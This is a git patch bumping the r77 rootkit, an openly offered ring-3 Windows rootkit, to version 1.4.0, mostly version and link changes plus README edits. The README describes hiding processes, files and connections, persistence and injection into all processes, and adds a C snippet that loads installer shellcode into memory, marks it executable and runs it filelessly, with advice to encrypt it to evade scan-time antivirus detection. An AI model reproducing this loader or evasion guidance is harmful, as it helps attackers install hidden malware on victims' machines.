From 0b3157ce7a56da9969be51513134bacf437b22e1 Mon Sep 17 00:00:00 2001
From: bytecode77
Date: Thu, 1 Sep 2022 08:26:25 +0200
Subject: [PATCH] 1.4.0

---
 LICENSE.md | 2 +-
 README.md | 30 +++++++++++++++++++++++-----
 src/GlobalAssemblyInfo.cs | 6 +++---
 vs/TestConsole/Views/AboutPopup.xaml | 2 +-
 4 files changed, 30 insertions(+), 10 deletions(-)

diff --git a/LICENSE.md b/LICENSE.md
index ece26bb..42ff427 100644
--- a/LICENSE.md
+++ b/LICENSE.md
@@ -1,4 +1,4 @@
-Copyright (c) 2021, bytecode77
+Copyright (c) 2022, bytecode77
 All rights reserved.
 
 Redistribution and use in source and binary forms, with or without
diff --git a/README.md b/README.md
index 55bc6c0..d45ecb5 100644
--- a/README.md
+++ b/README.md
@@ -11,8 +11,6 @@ r77 is a ring 3 Rootkit that hides following entities from all processes:
 - Services
 - TCP & UDP connections
 
-It is compatible with Windows 7 and Windows 10 in both x64 and x86 editions.
-
 ## Hiding by prefix
 
 All entities where the name starts with `"$77"` are hidden.
@@ -25,16 +23,38 @@ The dynamic configuration system allows to hide processes by **PID** and by **na ![](https://bytecode77.com/images/pages/r77-rootkit/config.png) -The configuration is stored in `HKEY_LOCAL_MACHINE\SOFTWARE\$77config` and is writable by any process without elevated privileges. The DACL of this key is set to grant full access to any user. +The configuration is located in `HKEY_LOCAL_MACHINE\SOFTWARE\$77config` and is writable by any process without elevated privileges. The DACL of this key is set to grant full access to any user. The `$77config` key is hidden when RegEdit is injected with the rootkit. ## Installer -r77 is deployable using a single file `"Install.exe"`. It installs the r77 service that starts before the first user is logged on. This background process injects all currently running processes, as well as processes that spawn later. Two processes are needed to inject both 32-bit and 64-bit processes. Both processes are hidden by ID using the configuration system. +r77 is deployable using a single file `"Install.exe"`. The installer persists r77 and injects all currently running processes. `Uninstall.exe` removes r77 from the system and gracefully detaches the rootkit from all processes. +`Install.shellcode` is the shellcode equivalent of the installer. This way, the installer can be integrated without dropping `Install.exe`. It can simply be loaded into memory, casted to a function pointer, and executed: + +``` +int main() +{ + // 1. Load Install.shellcode from resources or from a BYTE[] + // Ideally, encrypt the file and decrypt it here to avoid scantime detection. + LPBYTE shellCode = ... + + // 2. Make the shellcode RWX. + DWORD oldProtect; + VirtualProtect(shellCode, shellCodeSize, PAGE_EXECUTE_READWRITE, &oldProtect); + + // 3. Cast the buffer to a function pointer and execute it. + ((void(*)())shellCode)(); + + // This is the fileless equivalent to executing Install.exe. 
+ + return 0; +} +``` + ## Child process hooking When a process creates a child process, the new process is injected before it can run any of its own instructions. The function `NtResumeThread` is always called when a new process is created. Therefore, it's a suitable target to hook. Because a 32-bit process can spawn a 64-bit child process and vice versa, the r77 service provides a named pipe to handle child process injection requests. @@ -103,7 +123,7 @@ Please read the [technical documentation](https://docs.bytecode77.com/r77-rootki ## Downloads -[![](https://bytecode77.com/public/fileicons/zip.png) r77 Rootkit 1.3.0.zip](https://downloads.bytecode77.com/r77Rootkit%201.3.0.zip) +[![](https://bytecode77.com/public/fileicons/zip.png) r77 Rootkit 1.4.0.zip](https://downloads.bytecode77.com/r77Rootkit%201.4.0.zip) (**ZIP Password:** bytecode77)
[![](https://bytecode77.com/public/fileicons/pdf.png) Technical Documentation](https://docs.bytecode77.com/r77-rootkit/Technical%20Documentation.pdf)
diff --git a/src/GlobalAssemblyInfo.cs b/src/GlobalAssemblyInfo.cs
index 52ee8b2..6920bcf 100644
--- a/src/GlobalAssemblyInfo.cs
+++ b/src/GlobalAssemblyInfo.cs
@@ -1,8 +1,8 @@
 using System.Reflection;
 
-[assembly: AssemblyVersion("1.3.0")]
-[assembly: AssemblyFileVersion("1.3.0")]
-[assembly: AssemblyCopyright("© bytecode77, 2021.")]
+[assembly: AssemblyVersion("1.4.0")]
+[assembly: AssemblyFileVersion("1.4.0")]
+[assembly: AssemblyCopyright("© bytecode77, 2022.")]
 
 namespace Global
 {
diff --git a/vs/TestConsole/Views/AboutPopup.xaml b/vs/TestConsole/Views/AboutPopup.xaml
index 6167a0c..fa30b67 100644
--- a/vs/TestConsole/Views/AboutPopup.xaml
+++ b/vs/TestConsole/Views/AboutPopup.xaml
@@ -32,7 +32,7 @@
-
+